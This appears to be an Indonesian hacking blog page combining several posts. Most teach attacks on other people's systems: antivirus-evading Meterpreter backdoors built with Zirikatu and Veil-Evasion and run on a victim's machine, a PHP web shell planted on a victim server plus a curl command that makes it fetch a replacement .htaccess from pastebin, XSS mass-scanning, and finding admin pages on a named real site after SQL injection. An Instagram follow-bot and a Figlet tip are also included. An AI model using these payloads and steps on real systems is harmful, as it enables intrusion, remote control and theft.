Maxteroit: Tools

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1



Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1 - Ebook mengenai Hacking, Programming, Networking & Security sudah bertebaran di Internet, yap seperti di Blog Ini :D Maxteroit tercinta. Berhubungan banyak yang request mengenai Upload Ebook-ebook yang saya punya :'D  (permintaan dari teman FB) , dengan begitu saya dengan senang hati share koleksi-koleksi ebook yang saya punya, berikut screenshotnya :

(GrayHat Hacking-721 pages)


(Practical Reverse Engineering-383 pages)


Nah itu baru secuil aj :D, 
Berikut Nama sekaligus Linknya :














Itulah Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1 ,
Penasaran dengan 2 Sampel diatas bukan ? 
tunggu di update-an selanjutnya yha, jgn lupa subscribe, atau jika ingin minta langsung, bisa hubungi saya via email =====> [email protected]

Untuk Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 1, segitu dulu yha :'p
thx

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 1

Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD)


Jika sebelumnya saya bahas hack windows  dengan msfvenom biasa (tanpa bantuan apapun, tapi kali ini saya akan share tutorial bagaimana Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD).

Baca Juga :
Cara Membuat Backdoor Fud Menggunakan Veil-Evasion
Hack Windows Beda Jaringan Menggunakan Metasploit 

Oke langsung saja ke tutorial utamanya, cekidot.....

Download terlebih dahulu zirikatunya di github, bisa clone, bisa juga didownload langsung (dalam format zip) di link berikut
https://github.com/pasahitz/zirikatu

Jika sudah didownload, silahkan ekstrak file zirikatunya tadi, lalu buka folder yg sudah diekstrak menggunakan terminal, seperti berikut.....


Lalu jalankan tool Zirikatunya :


Disana terdapat beberapa pilihan, bisa kalian coba-coba sendiri, disini saya memilih pilihan yang nomor 3, yaitu Meterpreter_Reverse_https

Selanjutnya :
Set LHOST-nya, karena disini hanya jangkauan lokal, kita gunakan ip lokal kita, bisa dilihat dengan menggunakan perintah
ifconfig

Lalu set LPORT kita, kalian bisa set bebas berapapun angkanya, (karna lokal).
Untuk langkah  selanjutnya, bisa menyesuaikan....


Nah disana ada pertanyaan blablabla, kita yes kan saja, agar langsung masuk ke msfconsole dan si Zirikatunya sendiri sudah men-set sesuai dengan payload yang sudah kita buat, kita hanya tinggal menjalankan backdoornya di OS korban :D

Ok kita jalankan backdoornya..

(Sebelum Backdoor dieksekusi)

(Sesudah Dieksekusi).

Untuk lebih jelasnya, bisa disimak langsung lewat video berikut :

link =====> https://www.youtube.com/watch?v=i8cInI46fRQ



Ok sekian saja tutor saya :D ,
ouh iyha, untuk yang beda jaringan-nya akan menyusul, masih banyak tugas kuliah xixixixi.

Hack Windows 10 (Bypass Antivirus) Using Zirikatu (FUD)


Akses Shell, Bukan Download! - Shell Backdoor dalam computer security system ,merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).

Salah satu cara mananamkan shell backdoor pada server adalah dengan metode  JQuery File Upload, tapi pernahkah kalian melakukan cara ini namun saat meng-akses shell, shell backdoor kalian malah ter-download? Oke, kita bahas solusinya.


  • .htaccess
Salah satu penyebab shell malah ter-download adalah htaccess. Apa itu htaccess? .htaccess adalah file untuk merubah beberapa konfigurasi untuk mengarahkan pada web server Apache.

AddType application/octet-stream .php

Lalu bagaimana solusinya? Solusinya adalah me-replace htaccess server dengan htaccess kita sendiri.

Bagaimana caranya??

  • 1. Siapkan file .php berisi script berikut,
<?php passthru($_POST['cmd']); __halt_compiler(); ?>
  • 2. Upload ke server korban.
  • 3. Buka termninal, ketikkan perintah,
curl -d cmd="wget https://pastebin.com/raw/ttPzvDjQ -O .htaccess" urlshell
contoh:
curl -d cmd="wget https://pastebin.com/raw/ttPzvDjQ -O .htaccess" http://maxteroit.com/shell.php


  • 4. Upload shell dengan format .berandal > contoh: shell.berandal
Contoh hasil upload:  
https://www.hicinko.com/cruisecms/public/uploadcontent/server/php/files//kecil.berandal

Penutup,
Semua artikel yang dimuat Maxteroit, hanya untuk pembelajaran saja, penggunaan untuk melanggar hukum diluar tanggung jawab Maxteroit. Jika ada kurang jelas atau ada yang ditanyakan, tinggal kan di kolom komentar.

Terima Kasih,
Berandal. 

Akses Shell, Bukan Download!


XSSSNIPER is an handy xss discovery tool with mass scanning functionalities.

Usage:
Usage: xsssniper.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     target URL
  --post                try a post request to target url
  --data=POST_DATA      post data to use
  --threads=THREADS     number of threads
  --http-proxy=HTTP_PROXY
                        scan behind given proxy (format: 127.0.0.1:80)
  --tor                 scan behind default Tor
  --crawl               crawl target url for other links to test
  --forms               crawl target url looking for forms to test
  --user-agent=USER_AGENT
                        provide an user agent
  --random-agent        perform scan with random user agents
  --cookie=COOKIE       use a cookie to perform scans
  --dom                 basic heuristic to detect dom xss

Examples:
Scanning a single url with GET params:
$ python xsssniper.py -u "http://target.com/index.php?page=test"
Scanning a single url with POST params:
$ python xsssniper.py -u "http://target.com/index.php" --post --data=POST_DATA
Crawl a single url looking for forms to scan:
$ python xsssniper.py -u "http://target.com" --forms
Mass scan an entire website:
$ python xsssniper.py -u "http://target.com" --crawl
Mass scan an entire website forms included:
$ python xsssniper.py -u "http://target.com" --crawl --forms
Analyze target page javascripts (embedded and linked) to search for common sinks and sources:
$ python xsssniper.py -u "http://target.com" --dom


XSSSNIPER


Cara Mengganti Header Terminal Mac OS X Menggunakan Figlet. Banyak sekali cara mengganti tampilan header terminal di Mac OS X. Misalnya, kita bisa menggunakan Figlet atau Cowsay atau yang lainnya. Kali ini kita bahas Cara Mengganti Header Terminal Mac OS X Menggunakan Figlet.

Baca Juga: Kumpulan Video Pembelajaran Pentesting Menggunakan Kali Linux

Figlet adalah sebuah program komputer yang menghasilkan teks spanduk, dalam berbagai tipografi, terdiri dari huruf-huruf terbuat dari kecil konglomerasi ASCII karakter (lihat ASCII art).Diantar kalian mungkin bosen dengan tampilan terminal yang hanya sebuah tempat hitam kosong.

Cara paling cepat untuk meng-install Figlet adalah menggunakan HomeBrew. Kalian bisa meng-install homebrew dengan perintah:

 ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)”

Setelah itu kalian install figlet, dengan mengetik perintah:

brew install figlet

Ketika Figlet sudah ter-install, kalian bisa melihat semua font yang tersedia di sana dengan mengetik perintah:

showfigfonts

Ketika kalian udah selesai memilih font, ketik kata yang kalian inginkan, disini saya contoh kan:

showfigfonts "Maxteroit"

Setelah itu, copy text ASCII yang kalian inginkan. Nah, untuk mengganti tampilan header terminal kalian, ketikkan perintah:

sudo pico /etc/motd

Paste text ASCII yang kalian copy tadi. Lalu tekan Control+O (Overwrite) untuk menyimpan. Lalu Control+X untuk keluar.

Buka terminal baru dan header kalian sudah berubah!

Cara Mengganti Header Terminal Mac OS X Menggunakan Figlet

Menambah Follower Dengan Instagram Private Tools Termux
Ini bukanlah hack followers instagram lewat termux tetapi cara termudah untuk mendapatkan atau menambah follower instagram secara tertarget di termux. cara menambah followers instagram lewat termux ini sangat mudah dilakukan walaupun kamu baru tau termux, banyak sekali menambah followers instagram lewat termux tapi tool ini lah yang menurut saya paling bagus, tool Instagram ini telah saya update link reponya dan bisa digunakan kembali, bagi yang belum tau saya jelaskan sedikit fungsi tool ini. Jadi jika ada tutorial yang mengatakan hack followers instagram termux itu bohong, tidak ada unsur hackingnya, jadi sekali lagi ini bukan hack followers instagram lewat termux. Ini lebih tepatnya adalah trik menambah followers intagram dengan cepat lewat termux.

Instagram Private Tool ini berfungsi mencari followers sesuai target yang kamu mau, walaupun sistemnya masih sama yaitu follow unfollow tapi ini bisa dilakukan secara otomatis, kamu hanya perlu setting saja dan tool ini otomatis menjalakan "pekerjaan"nya. Simak tahapan cara menambah followers instagram di termux.

Install Instagram Private Tool Termux Untuk Menambah Followers

Saya sudah update tutorial yang lebih lengkap disini Hack Follower Instagram dengan Termux

Fitur Instagram Private Tool Termux :

  1. Unfollow not Followback
  2. Unfollow all Following
  3. Delete all media
  4. Follow Followers Target
  5. Bom Like Media Target
  6. Follow Account By Hashtag

Thanks To CCOCOT (https://web.facebook.com/Ccocot)For Making this tools.

kelebihan tool ini kamu bisa menargetkan follower kamu sesuai dengan hashtag, dan follower kamu pun follower aktif pastinya, jika following kamu sudah banyak kamu bisa tuh gunakan fitur "Unfollow all Following" atau "Unfollow not Followback".

Cara menambah followers instagram lewat termux ini bisa kamu lakukan berulang-ulang dan bisa di tinggal, hanya perlu sedikit settingan lalu jalankan.

Menambah Followers Dengan Instagram Private Tools Termux

Gambar Hanya Pemanis.

Cara Mencari Halaman Login Admin

Sore gaes, lama juga gw ga nongol, hehe. Jadi pengen peluk kalian semua satu - satu, Unchh.
Kali ini gw balik dengan Tutorial Cara Mencari Halaman Login Admin.

Pernah gak kalian, abis maen SQLi misalnya, user/pass udah dapet, password udah berhasil di decrypt, tapi ganemu Halaman Login Admin? Sering. Nah, disini gw bawain beberapa cara nemuin halaman terkutuk itu :P

1. Havij.
Ya, Havij. Havij ini salah satu alat yang membantu penguji penetrasi untuk mencari dan mengeksploitasi kelemahan SQL Injection pada halaman web. Dan disana ada fitur admin finder nya loh.

Tutorial SQLi dengan Havij


2.  Admin Finder.
Di dunia ini, coba gw tanya, ada berapa tool adminfinder? Banyak :P Kalian bisa gunain salah satu dari mereka. Misal, dari sini. 

3. View Source.
Lahh? Kok View Source? 
Mungkin beberapa dari kalian belum tau ya :P Jadi kita intip2 source code web tadi.  
Lihat contoh ini,


 Disitu bisa kita lihat, sebelum dir uploaded_files , ada dir lagi dengan nama dashboard, kalian tau kan artinya? Wkwk.

4 . Intip Sampai ke Developernya.
Iya, cara ini emang gak umum banget, juga ini ada unsur - unsur factor face biasanya, wkwk.
Kebanyakan web, di bagian footer bakal ada nama developer dari web tadi. Nah, kita intip kesana, yuk gw tunjukin.
1. Target : http://mer99furniture.com/
2. Lihat ke pojok kanan bawah. Disitu tertulis Development by Mobista Technologies.
3. Dari web Mobista Technologies, kita intip - intip lagi. Dan gw nemu, di sini.
4. Kebetulan disana kita bisa lihat demo back-end dari web-web hasil karya Mobista Technologies. Dan salah satunya di sini.
5.Tinggal kita sama kan dengan target pertama, dan .. Gotcha! I got you! Halaman admin target berada di site/ew-admin. Persis seperti demo di web Mobista Technologies.

Mungkin cara terakhir agak rumit karena emang kita masuk banget sampe intip - intip ke web developer nya, hehe. But, Trust Me, it works.

Sekian postingan gw kali ini. Sampe Ketemu di postingan gw selanjutanya.

Cara Mencari Halaman Login Admin

Cara Membuat Backdoor FUD Menggunakan Veil-evasion

 


Hello everyone, nah sesuai janji gw kemarin, gw bakalan share bagaimana Cara Membuat Backdoor FUD Menggunakan Veil-evasion. Oke veil-evasion yg kita gunain yaitu veil versi 2.28.2, kalian tinggal menyesuaikan saja :) , tanpa basa basi, kita langsung saja bahas tutorialnya.

Baca juga :

Jika belum mempunyai veil-evasion, kita bisa langsung install lewat terminal dengan perintah :
apt-get install veil-evasion

Oke kalo sudah terinstall, tinggal run saja veil evasionnya,

1.  untuk melihat jenis-jenis payload yg tersedia, kita ketikkan perintah berikut
list

2. setelah itu akan muncul beberapa jenis list payload yg bisa kita gunakan, pada versi veil kita, ada 51 jenis payload yg bisa kita buat, disini kita menggunakan payload yg bernomor 49, lalu kita ketik perintah :
use 49

karena payload yg kita gunakan bernomor 49.

3. Setelah itu kita set LHOST dan LPORT kita seperti biasanya.
kita set Lhost dulu dengan perintah :
set LHOST 192.x.x.x

LHOST tersebut silahkan sesuaikan dengan ip kalian, mau lokal, atau publik, terserah,

4. Lalu jika ingin mengatur port, kalian juga bisa atur sesuka hati, tp karna tutor berikut untuk lokal, saya membiarkan port tersebut default, yaitu 4444

5. Untuk melihat detail info yg telah kita atur, kalian bisa mengetikkan perintah :
info

disana akan muncul deskripsi payload yg akan kita generate

6. Jika sudah sesuai keinginan, tinggal kita generate saja payloadnya dengan perintah
generate

7. Setelah itu kita akan disuruh memberi nama payload kita, yha kalian isi saja sesuai keinginan dan kebutuhan kalian ^_^

8. jika generate sudah selesai, lokasi payload yg telah kita buat lokasinya ada di : /usr/share/veil-output/compiled/namapayloadkalian.exe

9. Handler file kita berlokasi di : /usr/share/veil-output/namapayload_handler.rc
 (silahkan copy saja lokasi itu seperti gambar berikut


10. Lalu buat tab baru untuk tab msfconsolenya dan ketikkan perintah :
msfconsole -r /usr/share/veil-output/handler/namapayloadkalian_handler.rc

ket : setelah dir "handler", tinggal pastekan kan saja yg telah kita copy sebelumnya :)

11. Setelah itu tinggal copy kan saja Payload/backdoor yg telah kita buat pada korban kita :) lalu Run payload kita, dan sesi meterpreter pun akan terbuka ^^

12. Setelah terbuka, terserah kalian mau kalian apakan :'v, jika kurang jelas, berikut video tutorialnya

berikut linknya : https://www.youtube.com/watch?v=LF9Zi_jg7uA

Sekian saja Tutorial dari Maxteroit, mohon maaf jika ada kekurangan, jika ada yg masih tidak jelas silahkan tanyakan di kolom komentar, terima kasih :)

Cara Membuat Backdoor FUD Menggunakan Veil-evasion

Subscribe Our Newsletter